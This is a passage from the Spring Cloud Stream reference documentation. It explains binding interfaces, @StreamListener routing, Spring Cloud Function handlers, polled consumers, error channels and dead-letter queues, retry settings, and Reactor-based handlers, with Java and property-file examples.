upper case.\n\n[source, java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic class MyApplication {\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MyApplication.class, args);\n\t}\n\n\t@StreamListener(Processor.INPUT)\n\t@SendTo(Processor.OUTPUT)\n\tpublic String handle(String value) {\n\t\tSystem.out.println(\"Received: \" + value);\n\t\treturn value.toUpperCase();\n\t}\n}\n----\n\nAs you can see the `@EnableBinding` annotation can take one or more interface classes as parameters. The parameters are referred to as _bindings_,\nand they contain methods representing _bindable components_.\nThese components are typically message channels (see https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-messaging.html[Spring Messaging])\nfor channel-based binders (such as Rabbit, Kafka, and others). However other types of bindings can\nprovide support for the native features of the corresponding technology. For example Kafka Streams binder (formerly known as KStream) allows native bindings directly to Kafka Streams\n(see https:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud-stream-binder-kafka-docs\/1.1.0.M1\/reference\/htmlsingle\/[Kafka Streams] for more details).\n\nSpring Cloud Stream already provides _binding_ interfaces for typical message exchange contracts, which include:\n\n* *Sink:* Identifies the contract for the message consumer by providing the destination from which the message is consumed.\n* *Source:* Identifies the contract for the message producer by providing the destination to which the produced message is sent.\n* *Processor:* Encapsulates both the sink and the source contracts by exposing two destinations that allow consumption and production of messages.\n\n[source, java]\n----\npublic interface Sink {\n\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n}\n----\n\n[source, java]\n----\npublic interface Source {\n\n String OUTPUT = \"output\";\n\n @Output(Source.OUTPUT)\n MessageChannel output();\n}\n----\n\n[source, java]\n----\npublic interface Processor extends Source, Sink {}\n----\n\nWhile the preceding example satisfies the majority of cases, you can also define your own contracts by defining your own bindings interfaces and use `@Input` and `@Output`\nannotations to identify the actual _bindable components_.\n\nFor example:\n\n[source, java]\n----\npublic interface Barista {\n\n @Input\n SubscribableChannel orders();\n\n @Output\n MessageChannel hotDrinks();\n\n @Output\n MessageChannel coldDrinks();\n}\n----\n\nUsing the interface shown in the preceding example as a parameter to `@EnableBinding` triggers the creation of the three bound channels named `orders`, `hotDrinks`, and `coldDrinks`,\nrespectively.\n\nYou can provide as many binding interfaces as you need, as arguments to the `@EnableBinding` annotation, as shown in the following example:\n\n[source, java]\n----\n@EnableBinding(value = { Orders.class, Payment.class })\n----\n\nIn Spring Cloud Stream, the bindable `MessageChannel` components are the Spring Messaging `MessageChannel` (for outbound) and its extension, `SubscribableChannel`,\n(for inbound).\n\n*Pollable Destination Binding*\n\nWhile the previously described bindings support event-based message consumption, sometimes you need more control, such as rate of consumption.\n\nStarting with version 2.0, you can now bind a pollable consumer:\n\nThe following example shows how to bind a pollable consumer:\n\n[source, java]\n----\npublic interface PolledBarista {\n\n @Input\n PollableMessageSource orders();\n\t. . .\n}\n----\n\nIn this case, an implementation of `PollableMessageSource` is bound to the `orders` \u201cchannel\u201d. See <<Using Polled Consumers>> for more details.\n\n*Customizing Channel Names*\n\nBy using the `@Input` and `@Output` annotations, you can specify a customized channel name for the channel, as shown in the following example:\n\n[source, java]\n----\npublic interface Barista {\n @Input(\"inboundOrders\")\n SubscribableChannel orders();\n}\n----\n\nIn the preceding example, the created bound channel is named `inboundOrders`.\n\nNormally, you need not access individual channels or bindings directly (other then configuring them via `@EnableBinding` annotation). However there may be\ntimes, such as testing or other corner cases, when you do.\n\nAside from generating channels for each binding and registering them as Spring beans, for each bound interface, Spring Cloud Stream generates a bean that implements the interface.\nThat means you can have access to the interfaces representing the bindings or individual channels by auto-wiring either in your application, as shown in the following two examples:\n\n_Autowire Binding interface_\n\n[source, java]\n----\n@Autowire\nprivate Source source\n\npublic void sayHello(String name) {\n source.output().send(MessageBuilder.withPayload(name).build());\n}\n----\n\n_Autowire individual channel_\n\n[source, java]\n----\n@Autowire\nprivate MessageChannel output;\n\npublic void sayHello(String name) {\n output.send(MessageBuilder.withPayload(name).build());\n}\n----\n\nYou can also use standard Spring's `@Qualifier` annotation for cases when channel names are customized or in multiple-channel scenarios that require specifically named channels.\n\nThe following example shows how to use the @Qualifier annotation in this way:\n\n[source, java]\n----\n@Autowire\n@Qualifier(\"myChannel\")\nprivate MessageChannel output;\n----\n\n[[spring-cloud-stream-overview-producing-consuming-messages]]\n=== Producing and Consuming Messages\n\nYou can write a Spring Cloud Stream application by using either Spring Integration annotations or Spring Cloud Stream native annotation.\n\n==== Spring Integration Support\n\nSpring Cloud Stream is built on the concepts and patterns defined by http:\/\/www.enterpriseintegrationpatterns.com\/[Enterprise Integration Patterns] and relies\nin its internal implementation on an already established and popular implementation of Enterprise Integration Patterns within the Spring portfolio of projects:\nhttps:\/\/projects.spring.io\/spring-integration\/[Spring Integration] framework.\n\nSo its only natural for it to support the foundation, semantics, and configuration options that are already established by Spring Integration\n\nFor example, you can attach the output channel of a `Source` to a `MessageSource` and use the familiar `@InboundChannelAdapter` annotation, as follows:\n\n[source, java]\n----\n@EnableBinding(Source.class)\npublic class TimerSource {\n\n @Bean\n @InboundChannelAdapter(value = Source.OUTPUT, poller = @Poller(fixedDelay = \"10\", maxMessagesPerPoll = \"1\"))\n public MessageSource<String> timerMessageSource() {\n return () -> new GenericMessage<>(\"Hello Spring Cloud Stream\");\n }\n}\n----\n\nSimilarly, you can use @Transformer or @ServiceActivator while providing an implementation of a message handler method for a _Processor_ binding contract, as shown in the following example:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public Object transform(String message) {\n return message.toUpperCase();\n }\n}\n----\n\nNOTE: While this may be skipping ahead a bit, it is important to understand that, when you consume from the same binding using `@StreamListener` annotation, a pub-sub model is used.\nEach method annotated with `@StreamListener` receives its own copy of a message, and each one has its own consumer group.\nHowever, if you consume from the same binding by using one of the Spring Integration annotation (such as `@Aggregator`, `@Transformer`, or `@ServiceActivator`), those consume in a competing model.\nNo individual consumer group is created for each subscription.\n\n==== Using @StreamListener Annotation\n\nComplementary to its Spring Integration support, Spring Cloud Stream provides its own `@StreamListener` annotation, modeled after other Spring Messaging annotations\n(`@MessageMapping`, `@JmsListener`, `@RabbitListener`, and others) and provides conviniences, such as content-based routing and others.\n\n[source,java]\n----\n@EnableBinding(Sink.class)\npublic class VoteHandler {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Sink.INPUT)\n public void handle(Vote vote) {\n votingService.record(vote);\n }\n}\n----\n\nAs with other Spring Messaging methods, method arguments can be annotated with `@Payload`, `@Headers`, and `@Header`.\n\n\nFor methods that return data, you must use the `@SendTo` annotation to specify the output binding destination for data returned by the method, as shown in the following example:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Processor.INPUT)\n @SendTo(Processor.OUTPUT)\n public VoteResult handle(Vote vote) {\n return votingService.record(vote);\n }\n}\n----\n\n\n==== Using @StreamListener for Content-based routing\n\nSpring Cloud Stream supports dispatching messages to multiple handler methods annotated with `@StreamListener` based on conditions.\n\nIn order to be eligible to support conditional dispatching, a method must satisfy the follow conditions:\n\n* It must not return a value.\n* It must be an individual message handling method (reactive API methods are not supported).\n\nThe condition is specified by a SpEL expression in the `condition` argument of the annotation and is evaluated for each message.\nAll the handlers that match the condition are invoked in the same thread, and no assumption must be made about the order in which the invocations take place.\n\nIn the following example of a `@StreamListener` with dispatching conditions, all the messages bearing a header `type` with the value `bogey` are dispatched to the\n`receiveBogey` method, and all the messages bearing a header `type` with the value `bacall` are dispatched to the `receiveBacall` method.\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@EnableAutoConfiguration\npublic static class TestPojoWithAnnotatedArguments {\n\n @StreamListener(target = Sink.INPUT, condition = \"headers['type']=='bogey'\")\n public void receiveBogey(@Payload BogeyPojo bogeyPojo) {\n \/\/ handle the message\n }\n\n @StreamListener(target = Sink.INPUT, condition = \"headers['type']=='bacall'\")\n public void receiveBacall(@Payload BacallPojo bacallPojo) {\n \/\/ handle the message\n }\n}\n----\n\n*Content Type Negotiation in the Context of `condition`*\n\nIt is important to understand some of the mechanics behind content-based routing using the `condition` argument of `@StreamListener`, especially in the context of the type of the message as a whole.\nIt may also help if you familiarize yourself with the <<Content Type Negotiation>> before you proceed.\n\nConsider the following scenario:\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@EnableAutoConfiguration\npublic static class CatsAndDogs {\n\n @StreamListener(target = Sink.INPUT, condition = \"payload.class.simpleName=='Dog'\")\n public void bark(Dog dog) {\n \/\/ handle the message\n }\n\n @StreamListener(target = Sink.INPUT, condition = \"payload.class.simpleName=='Cat'\")\n public void purr(Cat cat) {\n \/\/ handle the message\n }\n}\n----\n\nThe preceding code is perfectly valid. It compiles and deploys without any issues, yet it never produces the result you expect.\n\nThat is because you are testing something that does not yet exist in a state you expect. That is because the payload of the message is not yet converted from the\nwire format (`byte[]`) to the desired type.\nIn other words, it has not yet gone through the type conversion process described in the <<Content Type Negotiation>>.\n\nSo, unless you use a SPeL expression that evaluates raw data (for example, the value of the first byte in the byte array), use message header-based expressions\n(such as `condition = \"headers['type']=='dog'\"`).\n\n\nNOTE: At the moment, dispatching through `@StreamListener` conditions is supported only for channel-based binders (not for reactive programming)\nsupport.\n\n\n[[_spring_cloud_function]]\n==== Spring Cloud Function support\n\nSince Spring Cloud Stream v2.1, another alternative for defining _stream handlers_ and _sources_ is to use build-in\nsupport for https:\/\/cloud.spring.io\/spring-cloud-function\/[Spring Cloud Function] where they can be expressed as beans of\n type `java.util.function.[Supplier\/Function\/Consumer]`.\n\nTo specify which functional bean to bind to the external destination(s) exposed by the bindings, you must provide `spring.cloud.stream.function.definition` property.\n\nHere is the example of the Processor application exposing message handler as `java.util.function.Function`\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic class MyFunctionBootApp {\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MyFunctionBootApp.class, \"--spring.cloud.stream.function.definition=toUpperCase\");\n\t}\n\n\t@Bean\n\tpublic Function<String, String> toUpperCase() {\n\t\treturn s -> s.toUpperCase();\n\t}\n}\n----\nIn the above you we simply define a bean of type `java.util.function.Function` called _toUpperCase_ and identify it as a bean to be used as message handler\nwhose 'input' and 'output' must be bound to the external destinations exposed by the Processor binding.\n\nBelow are the examples of simple functional applications to support Source, Processor and Sink.\n\nHere is the example of a Source application defined as `java.util.function.Supplier`\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Source.class)\npublic static class SourceFromSupplier {\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(SourceFromSupplier.class, \"--spring.cloud.stream.function.definition=date\");\n\t}\n\t@Bean\n\tpublic Supplier<Date> date() {\n\t\treturn () -> new Date(12345L);\n\t}\n}\n----\n\nHere is the example of a Processor application defined as `java.util.function.Function`\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic static class ProcessorFromFunction {\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(ProcessorFromFunction.class, \"--spring.cloud.stream.function.definition=toUpperCase\");\n\t}\n\t@Bean\n\tpublic Function<String, String> toUpperCase() {\n\t\treturn s -> s.toUpperCase();\n\t}\n}\n----\n\nHere is the example of a Sink application defined as `java.util.function.Consumer`\n[source,java]\n----\n@EnableAutoConfiguration\n@EnableBinding(Sink.class)\npublic static class SinkFromConsumer {\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(SinkFromConsumer.class, \"--spring.cloud.stream.function.definition=sink\");\n\t}\n\t@Bean\n\tpublic Consumer<String> sink() {\n\t\treturn System.out::println;\n\t}\n}\n----\n\n===== Functional Composition\n\nUsing this programming model you can also benefit from functional composition where you can dynamically compose complex handlers from a set of simple functions.\nAs an example let's add the following function bean to the application defined above\n[source,java]\n----\n@Bean\npublic Function<String, String> wrapInQuotes() {\n\treturn s -> \"\\\"\" + s + \"\\\"\";\n}\n----\nand modify the `spring.cloud.stream.function.definition` property to reflect your intention to compose a new function from both \u2018toUpperCase\u2019 and \u2018wrapInQuotes\u2019.\nTo do that Spring Cloud Function allows you to use `|` (pipe) symbol. So to finish our example our property will now look like this:\n\n[source,java]\n----\n\u2014spring.cloud.stream.function.definition=toUpperCase|wrapInQuotes\n----\n\n\n\n[[spring-cloud-streams-overview-using-polled-consumers]]\n==== Using Polled Consumers\n\n===== Overview\n\nWhen using polled consumers, you poll the `PollableMessageSource` on demand.\nConsider the following example of a polled consumer:\n\n[source,java]\n----\npublic interface PolledConsumer {\n\n @Input\n PollableMessageSource destIn();\n\n @Output\n MessageChannel destOut();\n\n}\n----\n\nGiven the polled consumer in the preceding example, you might use it as follows:\n\n[source,java]\n----\n@Bean\npublic ApplicationRunner poller(PollableMessageSource destIn, MessageChannel destOut) {\n return args -> {\n while (someCondition()) {\n try {\n if (!destIn.poll(m -> {\n String newPayload = ((String) m.getPayload()).toUpperCase();\n destOut.send(new GenericMessage<>(newPayload));\n })) {\n Thread.sleep(1000);\n }\n }\n catch (Exception e) {\n \/\/ handle failure\n }\n }\n };\n}\n----\n\nThe `PollableMessageSource.poll()` method takes a `MessageHandler` argument (often a lambda expression, as shown here).\nIt returns `true` if the message was received and successfully processed.\n\nAs with message-driven consumers, if the `MessageHandler` throws an exception, messages are published to error channels, as discussed in \"`<<binder-error-channels>>`\".\n\nNormally, the `poll()` method acknowledges the message when the `MessageHandler` exits.\nIf the method exits abnormally, the message is rejected (not re-queued), but see <<polled-errors>>.\nYou can override that behavior by taking responsibility for the acknowledgment, as shown in the following example:\n\n[source,java]\n----\n@Bean\npublic ApplicationRunner poller(PollableMessageSource dest1In, MessageChannel dest2Out) {\n return args -> {\n while (someCondition()) {\n if (!dest1In.poll(m -> {\n StaticMessageHeaderAccessor.getAcknowledgmentCallback(m).noAutoAck();\n \/\/ e.g. hand off to another thread which can perform the ack\n \/\/ or acknowledge(Status.REQUEUE)\n\n })) {\n Thread.sleep(1000);\n }\n }\n };\n}\n----\n\nIMPORTANT: You must `ack` (or `nack`) the message at some point, to avoid resource leaks.\n\nIMPORTANT: Some messaging systems (such as Apache Kafka) maintain a simple offset in a log. If a delivery fails and is re-queued with `StaticMessageHeaderAccessor.getAcknowledgmentCallback(m).acknowledge(Status.REQUEUE);`, any later successfully ack'd messages are redelivered.\n\nThere is also an overloaded `poll` method, for which the definition is as follows:\n\n[source,java]\n----\npoll(MessageHandler handler, ParameterizedTypeReference<?> type)\n----\n\nThe `type` is a conversion hint that allows the incoming message payload to be converted, as shown in the following example:\n\n[source,java]\n----\nboolean result = pollableSource.poll(received -> {\n\t\t\tMap<String, Foo> payload = (Map<String, Foo>) received.getPayload();\n ...\n\n\t\t}, new ParameterizedTypeReference<Map<String, Foo>>() {});\n----\n\n[[polled-errors]]\n===== Handling Errors\n\nBy default, an error channel is configured for the pollable source; if the callback throws an exception, an `ErrorMessage` is sent to the error channel (`<destination>.<group>.errors`); this error channel is also bridged to the global Spring Integration `errorChannel`.\n\nYou can subscribe to either error channel with a `@ServiceActivator` to handle errors; without a subscription, the error will simply be logged and the message will be acknowledged as successful.\nIf the error channel service activator throws an exception, the message will be rejected (by default) and won't be redelivered.\nIf the service activator throws a `RequeueCurrentMessageException`, the message will be requeued at the broker and will be again retrieved on a subsequent poll.\n\nIf the listener throws a `RequeueCurrentMessageException` directly, the message will be requeued, as discussed above, and will not be sent to the error channels.\n\n[[spring-cloud-stream-overview-error-handling]]\n=== Error Handling\n\nErrors happen, and Spring Cloud Stream provides several flexible mechanisms to handle them.\nThe error handling comes in two flavors:\n\n * *application:* The error handling is done within the application (custom error handler).\n\n * *system:* The error handling is delegated to the binder (re-queue, DL, and others). Note that the techniques are dependent on binder implementation and the\n capability of the underlying messaging middleware.\n\nSpring Cloud Stream uses the https:\/\/github.com\/spring-projects\/spring-retry[Spring Retry] library to facilitate successful message processing. See <<Retry Template>> for more details.\nHowever, when all fails, the exceptions thrown by the message handlers are propagated back to the binder. At that point, binder invokes custom error handler or communicates\nthe error back to the messaging system (re-queue, DLQ, and others).\n\n==== Application Error Handling\n\nThere are two types of application-level error handling. Errors can be handled at each binding subscription or a global handler can handle all the binding subscription errors. Let's review the details.\n\n.A Spring Cloud Stream Sink Application with Custom and Global Error Handlers\nimage::custom_vs_global_error_channels.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nFor each input binding, Spring Cloud Stream creates a dedicated error channel with the following semantics `<destinationName>.errors`.\n\nNOTE: The `<destinationName>` consists of the name of the binding (such as `input`) and the name of the group (such as `myGroup`).\n\nConsider the following:\n\n[source,text]\n----\nspring.cloud.stream.bindings.input.group=myGroup\n----\n\n[source,java]\n----\n@StreamListener(Sink.INPUT) \/\/ destination name 'input.myGroup'\npublic void handle(Person value) {\n\tthrow new RuntimeException(\"BOOM!\");\n}\n\n@ServiceActivator(inputChannel = Processor.INPUT + \".myGroup.errors\") \/\/channel name 'input.myGroup.errors'\npublic void error(Message<?> message) {\n\tSystem.out.println(\"Handling ERROR: \" + message);\n}\n----\n\nIn the preceding example the destination name is `input.myGroup` and the dedicated error channel name is `input.myGroup.errors`.\n\nNOTE: The use of @StreamListener annotation is intended specifically to define bindings that bridge internal channels and external destinations. Given that the destination\nspecific error channel does NOT have an associated external destination, such channel is a prerogative of Spring Integration (SI). This means that the handler\nfor such destination must be defined using one of the SI handler annotations (i.e., @ServiceActivator, @Transformer etc.).\n\nNOTE: If `group` is not specified anonymous group is used (something like `input.anonymous.2K37rb06Q6m2r51-SPIDDQ`), which is not suitable for error\nhandling scenarious, since you don't know what it's going to be until the destination is created.\n\nAlso, in the event you are binding to the existing destination such as:\n\n[source,text]\n----\nspring.cloud.stream.bindings.input.destination=myFooDestination\nspring.cloud.stream.bindings.input.group=myGroup\n----\n\nthe full destination name is `myFooDestination.myGroup` and then the dedicated error channel name is `myFooDestination.myGroup.errors`.\n\nBack to the example...\n\nThe `handle(..)` method, which subscribes to the channel named `input`, throws an exception. Given there is also a subscriber to the error channel `input.myGroup.errors`\nall error messages are handled by this subscriber.\n\nIf you have multiple bindings, you may want to have a single error handler. Spring Cloud Stream automatically provides support for\na _global error channel_ by bridging each individual error channel to the channel named `errorChannel`, allowing a single subscriber to handle all errors,\nas shown in the following example:\n\n[source,java]\n----\n@StreamListener(\"errorChannel\")\npublic void error(Message<?> message) {\n\tSystem.out.println(\"Handling ERROR: \" + message);\n}\n----\n\nThis may be a convenient option if error handling logic is the same regardless of which handler produced the error.\n\n==== System Error Handling\n\nSystem-level error handling implies that the errors are communicated back to the messaging system and, given that not every messaging system\nis the same, the capabilities may differ from binder to binder.\n\nThat said, in this section we explain the general idea behind system level error handling and use Rabbit binder as an example. NOTE: Kafka binder provides similar\nsupport, although some configuration properties do differ. Also, for more details and configuration options, see the individual binder's documentation.\n\nIf no internal error handlers are configured, the errors propagate to the binders, and the binders subsequently propagate those errors back to the messaging system.\nDepending on the capabilities of the messaging system such a system may _drop_ the message, _re-queue_ the message for re-processing or _send the failed message to DLQ_.\nBoth Rabbit and Kafka support these concepts. However, other binders may not, so refer to your individual binder\u2019s documentation for details on supported system-level\nerror-handling options.\n\n===== Drop Failed Messages\n\nBy default, if no additional system-level configuration is provided, the messaging system drops the failed message.\nWhile acceptable in some cases, for most cases, it is not, and we need some recovery mechanism to avoid message loss.\n\n===== DLQ - Dead Letter Queue\n\nDLQ allows failed messages to be sent to a special destination: - _Dead Letter Queue_.\n\nWhen configured, failed messages are sent to this destination for subsequent re-processing or auditing and reconciliation.\n\nFor example, continuing on the previous example and to set up the DLQ with Rabbit binder, you need to set the following property:\n\n[source,text]\n----\nspring.cloud.stream.rabbit.bindings.input.consumer.auto-bind-dlq=true\n----\n\nKeep in mind that, in the above property, `input` corresponds to the name of the input destination binding.\nThe `consumer` indicates that it is a consumer property and `auto-bind-dlq` instructs the binder to configure DLQ for `input`\ndestination, which results in an additional Rabbit queue named `input.myGroup.dlq`.\n\nOnce configured, all failed messages are routed to this queue with an error message similar to the following:\n\n[source,text]\n----\ndelivery_mode:\t1\nheaders:\nx-death:\ncount:\t1\nreason:\trejected\nqueue:\tinput.hello\ntime:\t1522328151\nexchange:\nrouting-keys:\tinput.myGroup\nPayload {\"name\u201d:\"Bob\"}\n----\n\nAs you can see from the above, your original message is preserved for further actions.\n\nHowever, one thing you may have noticed is that there is limited information on the original issue with the message processing. For example, you do not see a stack\ntrace corresponding to the original error.\nTo get more relevant information about the original error, you must set an additional property:\n\n[source,text]\n----\nspring.cloud.stream.rabbit.bindings.input.consumer.republish-to-dlq=true\n----\n\nDoing so forces the internal error handler to intercept the error message and add additional information to it before publishing it to DLQ.\nOnce configured, you can see that the error message contains more information relevant to the original error, as follows:\n\n[source,text]\n----\ndelivery_mode:\t2\nheaders:\nx-original-exchange:\nx-exception-message:\thas an error\nx-original-routingKey:\tinput.myGroup\nx-exception-stacktrace:\torg.springframework.messaging.MessageHandlingException: nested exception is\n org.springframework.messaging.MessagingException: has an error, failedMessage=GenericMessage [payload=byte[15],\n headers={amqp_receivedDeliveryMode=NON_PERSISTENT, amqp_receivedRoutingKey=input.hello, amqp_deliveryTag=1,\n deliveryAttempt=3, amqp_consumerQueue=input.hello, amqp_redelivered=false, id=a15231e6-3f80-677b-5ad7-d4b1e61e486e,\n amqp_consumerTag=amq.ctag-skBFapilvtZhDsn0k3ZmQg, contentType=application\/json, timestamp=1522327846136}]\n at org.spring...integ...han...MethodInvokingMessageProcessor.processMessage(MethodInvokingMessageProcessor.java:107)\n at. . . . .\nPayload {\"name\u201d:\"Bob\"}\n----\n\nThis effectively combines application-level and system-level error handling to further assist with downstream troubleshooting mechanics.\n\n===== Re-queue Failed Messages\n\nAs mentioned earlier, the currently supported binders (Rabbit and Kafka) rely on `RetryTemplate` to facilitate successful message processing. See <<Retry Template>> for details.\nHowever, for cases when `max-attempts` property is set to 1, internal reprocessing of the message is disabled. At this point, you can facilitate message re-processing (re-tries)\nby instructing the messaging system to re-queue the failed message. Once re-queued, the failed message is sent back to the original handler, essentially creating a retry loop.\n\nThis option may be feasible for cases where the nature of the error is related to some sporadic yet short-term unavailability of some resource.\n\nTo accomplish that, you must set the following properties:\n\n[source,text]\n----\nspring.cloud.stream.bindings.input.consumer.max-attempts=1\nspring.cloud.stream.rabbit.bindings.input.consumer.requeue-rejected=true\n----\n\nIn the preceding example, the `max-attempts` set to 1 essentially disabling internal re-tries and `requeue-rejected` (short for _requeue rejected messages_) is set to `true`.\nOnce set, the failed message is resubmitted to the same handler and loops continuously or until the handler throws `AmqpRejectAndDontRequeueException`\nessentially allowing you to build your own re-try logic within the handler itself.\n\n==== Retry Template\n\nThe `RetryTemplate` is part of the https:\/\/github.com\/spring-projects\/spring-retry[Spring Retry] library.\nWhile it is out of scope of this document to cover all of the capabilities of the `RetryTemplate`, we will mention the following consumer properties that are specifically related to\nthe `RetryTemplate`:\n\nmaxAttempts::\nThe number of attempts to process the message.\n+\nDefault: 3.\nbackOffInitialInterval::\nThe backoff initial interval on retry.\n+\nDefault 1000 milliseconds.\nbackOffMaxInterval::\nThe maximum backoff interval.\n+\nDefault 10000 milliseconds.\nbackOffMultiplier::\nThe backoff multiplier.\n+\nDefault 2.0.\ndefaultRetryable::\nWhether exceptions thrown by the listener that are not listed in the `retryableExceptions` are retryable.\n+\nDefault: `true`.\nretryableExceptions::\nA map of Throwable class names in the key and a boolean in the value.\nSpecify those exceptions (and subclasses) that will or won't be retried.\nAlso see `defaultRetriable`.\nExample: `spring.cloud.stream.bindings.input.consumer.retryable-exceptions.java.lang.IllegalStateException=false`.\n+\nDefault: empty.\n\nWhile the preceding settings are sufficient for majority of the customization requirements, they may not satisfy certain complex requirements at, which\npoint you may want to provide your own instance of the `RetryTemplate`. To do so configure it as a bean in your application configuration. The application provided\ninstance will override the one provided by the framework. Also, to avoid conflicts you must qualify the instance of the `RetryTemplate` you want to be used by the binder\nas `@StreamRetryTemplate`. For example,\n\n[source,java]\n----\n@StreamRetryTemplate\npublic RetryTemplate myRetryTemplate() {\n return new RetryTemplate();\n}\n----\nAs you can see from the above example you don't need to annotate it with `@Bean` since `@StreamRetryTemplate` is a qualified `@Bean`.\n\n[[spring-cloud-stream-overview-reactive-programming-support]]\n=== Reactive Programming Support\n\nSpring Cloud Stream also supports the use of reactive APIs where incoming and outgoing data is handled as continuous data flows.\nSupport for reactive APIs is available through `spring-cloud-stream-reactive`, which needs to be added explicitly to your project.\n\nThe programming model with reactive APIs is declarative. Instead of specifying how each individual message should be handled, you can use operators that describe functional transformations from inbound to outbound data flows.\n\nAt present Spring Cloud Stream supports the only the https:\/\/projectreactor.io\/[Reactor API].\nIn the future, we intend to support a more generic model based on Reactive Streams.\n\nThe reactive programming model also uses the `@StreamListener` annotation for setting up reactive handlers.\nThe differences are that:\n\n* The `@StreamListener` annotation must not specify an input or output, as they are provided as arguments and return values from the method.\n* The arguments of the method must be annotated with `@Input` and `@Output`, indicating which input or output the incoming and outgoing data flows connect to, respectively.\n* The return value of the method, if any, is annotated with `@Output`, indicating the input where data should be sent.\n\nNOTE: Reactive programming support requires Java 1.8.\n\nNOTE: As of Spring Cloud Stream 1.1.1 and later (starting with release train Brooklyn.SR2), reactive programming support requires the use of Reactor 3.0.4.RELEASE and higher.\nEarlier Reactor versions (including 3.0.1.RELEASE, 3.0.2.RELEASE and 3.0.3.RELEASE) are not supported.\n`spring-cloud-stream-reactive` transitively retrieves the proper version, but it is possible for the project structure to manage the version of the `io.projectreactor:reactor-core` to an earlier release, especially when using Maven.\nThis is the case for projects generated by using Spring Initializr with Spring Boot 1.x, which overrides the Reactor version to `2.0.8.RELEASE`.\nIn such cases, you must ensure that the proper version of the artifact is released.\nYou can do so by adding a direct dependency on `io.projectreactor:reactor-core` with a version of `3.0.4.RELEASE` or later to your project.\n\nNOTE: The use of term, \"`reactive`\", currently refers to the reactive APIs being used and not to the execution model being reactive (that is, the bound endpoints still use a 'push' rather than a 'pull' model). While some backpressure support is provided by the use of Reactor, we do intend, in a future release, to support entirely reactive pipelines by the use of native reactive clients for the connected middleware.\n\n===== Reactor-based Handlers\n\nA Reactor-based handler can have the following argument types:\n\n* For arguments annotated with `@Input`, it supports the Reactor `Flux` type.\nThe parameterization of the inbound Flux follows the same rules as in the case of individual message handling: It can be the entire `Message`, a POJO that can be the `Message` payload, or a POJO that is the result of a transformation based on the `Message` content-type header. Multiple inputs are provided.\n* For arguments annotated with `Output`, it supports the `FluxSender` type, which connects a `Flux` produced by the method with an output. Generally speaking, specifying outputs as arguments is only recommended when the method can have multiple outputs.\n\nA Reactor-based handler supports a return type of `Flux`. In that case, it must be annotated with `@Output`. We recommend using the return value of the method when a single output `Flux` is available.\n\nThe following example shows a Reactor-based `Processor`:\n\n[source, java]\n----\n@EnableBinding(Processor.class)\n@EnableAutoConfiguration\npublic static class UppercaseTransformer {\n\n @StreamListener\n @Output(Processor.OUTPUT)\n public Flux<String> receive(@Input(Processor.INPUT) Flux<String> input) {\n return input.map(s -> s.toUpperCase());\n }\n}\n----\n\nThe same processor using output arguments looks like the following example:\n\n[source, java]\n----\n@EnableBinding(Processor.class)\n@EnableAutoConfiguration\npublic static class UppercaseTransformer {\n\n @StreamListener\n public void receive(@Input(Processor.INPUT) Flux<String> input,\n @Output(Processor.OUTPUT) FluxSender output) {\n output.send(input.map(s -> s.toUpperCase()));\n }\n}\n----\n\n===== Reactive Sources\n\nSpring Cloud Stream reactive support also provides the ability for creating reactive sources through the `@StreamEmitter` annotation.\nBy using the `@StreamEmitter` annotation, a regular source may be converted to a reactive one.\n`@StreamEmitter` is a method level annotation that marks a method to be an emitter to outputs declared with `@EnableBinding`.\nYou cannot use the `@Input` annotation along with `@StreamEmitter`, as the methods marked with this annotation are not listening for any input. Rather, methods marked with `@StreamEmitter` generate output.\nFollowing the same programming model used in `@StreamListener`, `@StreamEmitter` also allows flexible ways of using the `@Output` annotation, depending on whether the method has any arguments, a return type, and other considerations.\n\nThe remainder of this section contains examples of using the `@StreamEmitter` annotation in various styles.\n\nThe following example emits the `Hello, World` message every millisecond and publishes to a Reactor `Flux`:\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n @Output(Source.OUTPUT)\n public Flux<String> emit() {\n return Flux.intervalMillis(1)\n .map(l -> \"Hello World\");\n }\n}\n----\n\nIn the preceding example, the resulting messages in the `Flux` are sent to the output channel of the `Source`.\n\nThe next example is another flavor of an `@StreamEmmitter` that sends a Reactor `Flux`.\nInstead of returning a `Flux`, the following method uses a `FluxSender` to programmatically send a `Flux` from a source:\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n @Output(Source.OUTPUT)\n public void emit(FluxSender output) {\n output.send(Flux.intervalMillis(1)\n .map(l -> \"Hello World\"));\n }\n}\n----\n\nThe next example is exactly same as the above snippet in functionality and style.\nHowever, instead of using an explicit `@Output` annotation on the method, it uses the annotation on the method parameter.\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n public void emit(@Output(Source.OUTPUT) FluxSender output) {\n output.send(Flux.intervalMillis(1)\n .map(l -> \"Hello World\"));\n }\n}\n----\n\nThe last example in this section is yet another flavor of writing reacting sources by using the Reactive Streams Publisher API and taking advantage of the support for it in https:\/\/github.com\/spring-projects\/spring-integration-java-dsl\/wiki\/Spring-Integration-Java-DSL-Reference[Spring Integration Java DSL].\nThe `Publisher` in the following example still uses Reactor `Flux` under the hood, but, from an application perspective, that is transparent to the user and only needs Reactive Streams and 